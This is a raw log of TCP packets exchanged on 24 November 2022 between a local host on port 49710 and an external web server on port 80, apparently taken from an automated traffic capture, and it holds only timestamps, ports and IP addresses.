Nov 24, 2022 12:20:03.538388014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538415909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538433075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538440943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538467884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538480997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538480997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538480997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538495064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538522959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538537979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538548946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538575888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538577080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538593054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538599968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538604975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538625956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538625956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538650990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538655996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538678885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538681030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538707018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538708925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538733006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538738966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538760900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538770914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538786888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538805962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538811922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538830996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538834095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538851023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538850069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538887024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538901091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538918018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538924932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538944006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538954973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538963079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538980961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538983107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539006948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539014101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539014101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539027929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539031982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539047956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539068937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539088964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539097071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539105892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539123058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539125919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539146900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539150000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539165974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539170980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539185047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539202929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539206028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539206028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539222002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539233923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539242029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539259911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539263010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539278030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539290905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539304018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539311886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539329052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539356947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539371967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539371967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539383888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539391994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539406061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539412022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539438963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539450884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539465904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539465904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539482117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539494991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539516926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539520025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539546013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539561033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539566040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539587021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539592981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539611101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539614916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539614916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539633989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539652109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539666891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539671898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539689064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539690971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539707899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539731026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539736032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539750099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539750099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539762974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539768934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539774895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539788008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539805889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539807081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539824009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539824963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539844036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539858103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539876938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539896965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539897919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539901972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539916992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539927006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539946079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539963961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539964914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539978027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.539982080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.539992094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540013075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540028095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540031910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540052891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540065050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540071964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540091038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540095091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540110111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540128946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540143013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540148973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540148973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540157080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540168047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540175915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540199041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540204048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540216923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540216923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540235996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540254116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540271997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540286064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540286064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540286064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540288925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540307999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540312052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540333986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540354013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540368080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540373087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540381908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540390968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540409088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540421963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540426016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540440083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540448904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540468931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540472031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540487051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540507078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540524960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540524960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540532112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540546894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540556908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540580034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540604115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540605068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540604115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540626049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540632010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540652037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540671110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540689945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540697098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540697098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540713072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540715933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540735006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540743113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540749073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540765047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540783882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.540764093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540802002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540815115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.540838003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.547950983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559029102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559067011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559087038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559106112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559123993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559142113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559199095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559248924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559272051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559283018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559324026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559350014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559376955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559400082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559418917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559428930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559437037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559453964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559459925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559479952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559500933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559504986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559521914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559541941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559542894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559560061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559565067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559575081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559588909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559603930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559636116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559673071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559708118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559741020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559742928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559777021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559808969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559829950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559844971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559864044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559868097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559883118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559890985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559900999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559911966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559921980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559935093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559942007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559947014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.559962034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.559982061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560000896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560019970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560034990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560034990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560034990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560034990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560034990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560039043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560058117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560059071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560077906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560077906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560096979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560097933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560116053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560136080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560154915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560169935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560174942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560198069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560216904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560219049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560239077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560256004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560256958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560276031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560291052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560293913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560301065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560324907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560327053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560344934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560359001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560376883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560395956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560403109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560403109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560414076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560432911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560452938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560461044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560461044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560472965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560483932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560497999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560503006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560518980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560525894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560542107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560544014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560563087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560581923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560591936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560600996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560621023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560625076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560640097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560653925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560662985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560682058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560684919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560699940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560710907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560718060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560735941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560738087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560755968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560766935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560775995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560796976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560800076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560818911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560820103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560839891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560870886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560879946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560892105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560895920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560913086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560929060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.560933113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560956955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560981035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.560991049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.561005116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.561008930 CET	49710	80	192.168.2.3	66.235.200.147
